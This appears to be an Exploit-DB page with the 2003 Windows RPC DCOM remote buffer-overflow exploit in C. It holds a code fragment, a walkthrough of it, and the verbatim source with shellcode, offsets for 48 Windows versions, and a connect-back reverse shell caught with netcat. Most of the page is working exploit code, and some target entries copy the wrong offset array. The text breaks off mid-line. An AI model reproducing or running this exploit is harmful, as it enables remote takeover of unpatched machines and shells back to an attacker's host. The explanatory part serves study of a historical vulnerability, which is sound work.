else if (atoi(argv[4])==25)
memcpy(sc+36,win2ksp1kr,sizeof(win2ksp1kr));
else if (atoi(argv[4])==26)
memcpy(sc+36,win2ksp2kr,sizeof(win2ksp2kr));
else if (atoi(argv[4])==27)
memcpy(sc+36,win2knospmx,sizeof(win2knospmx));
else if (atoi(argv[4])==28)
memcpy(sc+36,win2ksp1mx,sizeof(win2ksp1mx));
else if (atoi(argv[4])==29)
memcpy(sc+36,win2knospken,sizeof(win2knospken));
else if (atoi(argv[4])==30)
memcpy(sc+36,win2ksp1ken,sizeof(win2ksp1ken));
else if (atoi(argv[4])==31)
memcpy(sc+36,win2ksp2ken,sizeof(win2ksp2ken));
else if (atoi(argv[4])==32)
memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
else if (atoi(argv[4])==33)
memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
else if (atoi(argv[4])==34)
memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
else if (atoi(argv[4])==35)
memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
else if (atoi(argv[4])==36)
memcpy(sc+36,win2k3nospeng,sizeof(win2k3nospeng));
else if (atoi(argv[4])==37) 
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp3ger));
else if (atoi(argv[4])==38) 
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger1));
else if (atoi(argv[4])==39) 
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger2));
else if (atoi(argv[4])==40) 
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1ger));
else if (atoi(argv[4])==41)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp1fr));
else if (atoi(argv[4])==42)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4fr));
else if (atoi(argv[4])==43)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp0fr));
else if (atoi(argv[4])==44)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1fr));
else if (atoi(argv[4])==45)
memcpy(sc+36,win2k3nospeng,sizeof(win2ksp3big));
else if (atoi(argv[4])==46)
memcpy(sc+36,win2k3nospeng,sizeof(win2ksp4big));
else if (atoi(argv[4])==47)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp01big));


port1 = htons(atoi(argv[3]));
port1 ^= 0x9393;
cb=inet_addr(argv[2]); 
cb ^= 0x93939393;
*(unsigned short *)&sc[330+0x30] = port1;
*(unsigned int *)&sc[335+0x30] = cb;
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; 
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;



if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
printf("Send failed pussy.\n");
exit(1);
}

len=recv(sockfd,buf1,1000,0);
if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {

printf("Send failed pussy\n");
exit (1);
}
len=recv(sockfd,buf1,1024,0);
return 0;
}

// milw0rm.com [2003-07-30]

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

The provided C code is a network-based exploit that uses Winsock for network communication.

Key components:

Includes and Pragmas:

stdio.h, stdlib.h, windows.h: Standard C libraries for input/output, general utilities, and Windows API access.
#pragma comment(lib,"ws2_32"): Links the Winsock 2.0 library, essential for network programming on Windows.
#define DWORD unsigned long: Defines DWORD as a 32-bit unsigned integer, common in Windows programming.
WSADATA wsa;: A structure to hold Windows Sockets initialization data.

bindstr[]:

This byte array likely represents a specific DCOM/RPC binding string or a part of a DCOM message. It's a sequence of raw bytes that the exploit sends to initiate communication or identify a service. Without more context or symbol names, its exact purpose within the DCOM handshake is hard to determine definitively, but it's a crucial part of the initial network traffic.

request1[]:

This is a large byte array representing a complex DCOM/RPC request. It's the primary data packet sent to the target.
It contains various fields typical of RPC/DCOM:
- Opcode/Function codes.
- Interface identifiers (GUIDs).
- Object identifiers.
- Data structures that likely describe the COM object being invoked and its methods.
Crucially, this request is crafted to trigger the buffer overflow. The 0xCC bytes (INT 3, breakpoint) within request4 (explained later) are often used as placeholders or debugging markers, but here they appear within request1 as well, suggesting they might be part of the overflowed data or padding.
Practical Purpose: This is the core exploit payload data that is sent over the network to the target's DCOM endpoint. It's designed to exploit a specific vulnerability.

request2[] and request3[]:

request2: A smaller byte sequence, likely part of the DCOM/RPC communication. It might represent a specific command or data segment within the overall interaction.
request3: Another byte sequence. The presence of 0x5C,0x00,0x43,0x00,0x24,0x00 (\, C, $, \) suggests it might be related to path manipulation or UNC paths (\\C$\...). This could be used to specify a target path for file operations or to interact with specific system resources.
Practical Purpose: These likely form parts of the DCOM/RPC message sequence, potentially used to set up the context for the exploit or to specify targets for the shellcode.

Target Offsets (winntsp4eng, winntsp5cn, etc.):

These are arrays of 4-byte hexadecimal values.
Each array represents a specific "offset" or "pointer" that is unique to a particular version and language/service pack of Windows.
These offsets are critical for the exploit to correctly overwrite the return address on the stack. The exploit code dynamically selects and injects one of these offsets into the shellcode based on the target specified by the user.
Practical Purpose: These are hardcoded addresses or relative offsets that point to specific locations in the vulnerable process's memory. They are used to ensure the shellcode is placed correctly and that the program flow is redirected to it.

Shellcode (sc[]):

This is the actual payload that will be executed on the target machine. It's a sequence of machine code instructions.
The shellcode is designed to:
- Stage 1 (Setup): Likely sets up the environment, possibly resolves necessary API functions, and prepares for the next stage. The initial bytes \x46\x00\x58\x00\x4E\x00\x42\x00 are unusual for typical x86 shellcode and might indicate a different architecture or a custom encoding. However, the later bytes like \xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff are common shellcode patterns for jumping to another section of code.
- Stage 2 (Target Offset Injection): The memcpy(sc+36, ..., sizeof(...)) lines in main are crucial. They take the selected target offset (e.g., winntsp4eng) and copy it into the sc buffer at a specific location (offset 36). This means the shellcode itself is designed to be patched with the correct target offset.
- Stage 3 (Exploitation Logic): The bulk of the shellcode, starting with \x7b\xe4\x93\x93..., contains the actual instructions to be executed. This part is heavily obfuscated and uses a lot of non-standard byte sequences, likely for evasion or to fit within specific buffer constraints. It's highly probable that this section contains code to:
  - Establish a network connection back to the attacker (connect-back shell).
  - Spawn a command shell (cmd.exe).
  - Redirect standard input, output, and error streams to the network socket.
- The \xCC\xCC\xCC\xCC bytes in request4 are often used as "NOP" (No Operation) instructions or as fill bytes. In this context, they might be used to pad the buffer to a specific size or to ensure that if the overflow occurs at a certain point, execution continues safely until the shellcode.
Practical Purpose: This is the malicious code that the attacker wants to run on the victim machine. It's designed to be small, self-contained, and to establish a reverse shell.

request4[]:

Another byte array, likely part of the DCOM/RPC interaction. The 0xCC bytes are prominent here.
Practical Purpose: This request might be used to finalize the exploit sequence or to provide specific data that, when combined with the overflow, leads to shellcode execution. The 0xCC bytes could be padding or specific values that trigger the overflow condition.

main function:

Initialization: Starts Winsock.
Usage Message: Prints help information if the correct number of command-line arguments is not provided.
Argument Parsing: Expects <victim IP>, <connectback IP>, <connectback port>, and <target number>.
Network Setup:
- Uses gethostbyname to resolve the victim's IP address.
- Creates a TCP socket (SOCK_STREAM).
- Connects to the victim on port 135 (the standard RPC/DCOM endpoint mapper port).
Target Selection: Based on the argv[4] (target number), it selects the appropriate offset array (e.g., winntsp4eng) and copies it into the sc (shellcode) buffer at offset 36. This is the patching step.
Exploit Execution:
- It constructs buf1 and buf2 by concatenating various request arrays. The exact composition and order are critical for the exploit to work.
- It sends these constructed buffers to the victim via the established socket.
- The code snippet provided is truncated, but it would typically involve sending request1, request2, request3, request4, and the patched sc in a specific sequence.
send() and recv(): (Implied, as the code is truncated) These functions would be used to send the exploit data and potentially receive any response from the target.
closesocket() and WSACleanup(): Cleans up network resources.

Mapping of code fragments to practical purpose:

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)

////////////////////////////////////////////////////////////////////////// // // Windows RPC DCOM Remote Exploit with 48 TARGETS (Fixed) // ////////////////////////////////////////////////////////////////////////// // // English - French - Chinese - Polish - German // Japanese - Korean - Mexican - Kenyan // // Tks to all wolrd wide contributors (Public Property) // // New Targets ? contrib@k-otik.com // ////////////////////////////////////////////////////////////////////////// #include <stdio.h> #include <stdlib.h> #include <windows.h> #pragma comment(lib,"ws2_32") #define DWORD unsigned long WSADATA wsa; unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x5C,0x00 ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; /* Myam add OFFSETS*/ char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */ char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */ char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */ char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */ char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/ char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */ char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */ char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */ char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */ char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */ char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */ char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */ char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */ char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */ char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */ char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */ char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */ char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */ char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */ char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */ char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */ char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */ char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */ char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */ char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */ char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1 same offset as win2kjp_sp1 ??*/ char win2ksp2kr[] = "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */ char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */ char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */ char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */ char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */ char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */ char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */ char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */ char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */ char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */ char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */ char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* Germanh win2 sp3 */ char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */ char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */ char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */ char Win2ksp1fr[] = "\x4b\x3e\xe4\x77"; /* French win2k Server SP1 */ char Win2ksp4fr[] = "\x56\xc2\xe2\x77"; /* French win2k Server SP4 */ char winxpsp0fr[] = "\x4a\x75\xd4\x77"; /* French win xp no sp */ char winxpsp1fr[] = "\xfc\x18\xd4\x77"; /* French win xp sp 1 */ char win2ksp3big[] = "\x25\x2b\xaa\x77"; char win2ksp4big[] = "\x29\x4c\xdf\x77"; char winxpsp01big[] = "\xfb\x7b\xa1\x71"; /* Test this offset ( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B Windows 2000 (no-service-pack) English 0x77e33f6d 0x77f92a9b 0x77e2afc5 0x772254b0 win2k3 0x77E829E3 / 0x77E83587 kokanin win2k sp3 */ unsigned char sc[]= "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x46\x00\x58\x00" "\x29\x4c\xdf\x77" //sp4 //"\x29\x2c\xe2\x77"//0x77e22c29 "\x38\x6e\x16\x76\x0d\x6e\x16\x76" //?????????? "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" "\x93\x40\xe2\xfa" // code "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1" "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2" "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93" "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7" "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0" "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8" "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93" "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93" "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0" "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87" "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60" "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5" "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90" "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22" "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18" "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92" "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3" "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93" "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9" "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18" "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; int main(int argc,char ** argv) { int len, len1, sockfd; short port=135; struct hostent *he; struct sockaddr_in their_addr; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; unsigned short port1; DWORD cb; WSAStartup(MAKEWORD(2,0),&wsa); printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n"); printf("RPC DCOM Remote Exploit modified by www.k-otiK.com ;>\n"); if(argc<5) { printf("[<$>] RPC Remote Windows Exploit\n"); printf("[<$>] Modified by www.k-otiK.com - New Exploits Database\n"); printf("[<$>] Thanks to b@digitalwaste.org + Jørgen_Haaø + woutiir \n"); printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]); printf("[<$>] On connect back nc -lp cbport\n"); printf("[<$>] Targets: 0 WinNT English +sp4\n"); printf("[<$>] 1 WinNT China +sp5\n"); printf("[<$>] 2 WinNT China +sp6\n"); printf("[<$>] 3 WinNT China +sp6a\n"); printf("[<$>] 4 Win2k Polish nosp ver 5.00.2195\n"); printf("[<$>] 5 Win2k Polish +sp3 ver 5.00.2195\n"); printf("[<$>] 6 Win2k Spanish +sp4\n"); printf("[<$>] 7 Win2k English nosp 1\n"); printf("[<$>] 8 Win2k English nosp 2\n"); printf("[<$>] 9 Win2k English +sp1\n"); printf("[<$>] 10 Win2k English +sp2 1\n"); printf("[<$>] 11 Win2k English +sp2 2\n"); printf("[<$>] 12 Win2k English +sp3 1\n"); printf("[<$>] 13 Win2k English +sp3 2\n"); printf("[<$>] 14 Win2k English +sp4\n"); printf("[<$>] 15 Win2k China nosp\n"); printf("[<$>] 16 Win2k China +sp1\n"); printf("[<$>] 17 Win2k China +sp2\n"); printf("[<$>] 18 Win2k China +sp3\n"); printf("[<$>] 19 Win2k China +sp4\n"); printf("[<$>] 20 Win2k German +sp3\n"); printf("[<$>] 21 Win2k Japanese nosp\n"); printf("[<$>] 22 Win2k Japanese +sp1\n"); printf("[<$>] 23 Win2k Japanese +sp2\n"); printf("[<$>] 24 Win2k Korea nosp\n"); printf("[<$>] 25 Win2k Korea +sp1\n"); printf("[<$>] 26 Win2k Korea +sp2\n"); printf("[<$>] 27 Win2k Mexican nosp\n"); printf("[<$>] 28 Win2k Mexican +sp1\n"); printf("[<$>] 29 Win2k Kenya nosp\n"); printf("[<$>] 30 Win2k Kenya +sp1\n"); printf("[<$>] 31 Win2k Kenya +sp2\n"); printf("[<$>] 32 WinXP English nosp ver 5.1.2600\n"); printf("[<$>] 33 WinXP English +sp1 1\n"); printf("[<$>] 34 WinXP English +sp1 2\n"); printf("[<$>] 35 WinXP English +sp2\n"); printf("[<$>] 36 Win2k3 English nosp\n"); printf("[<$>] 37 Win2k german sp3\n"); printf("[<$>] 38 Win2k german sp4\n"); printf("[<$>] 39 Win2k german sp4 2\n"); printf("[<$>] 40 Winxp german sp1 2\n"); printf("[<$>] 41 Win2k french sp1\n"); printf("[<$>] 42 Win2k french sp4\n"); printf("[<$>] 43 Winxp french sp0\n"); printf("[<$>] 44 Winxp french sp1\n"); printf("[<$>] 45 Win2k big5 sp3\n"); printf("[<$>] 46 Win2k big5 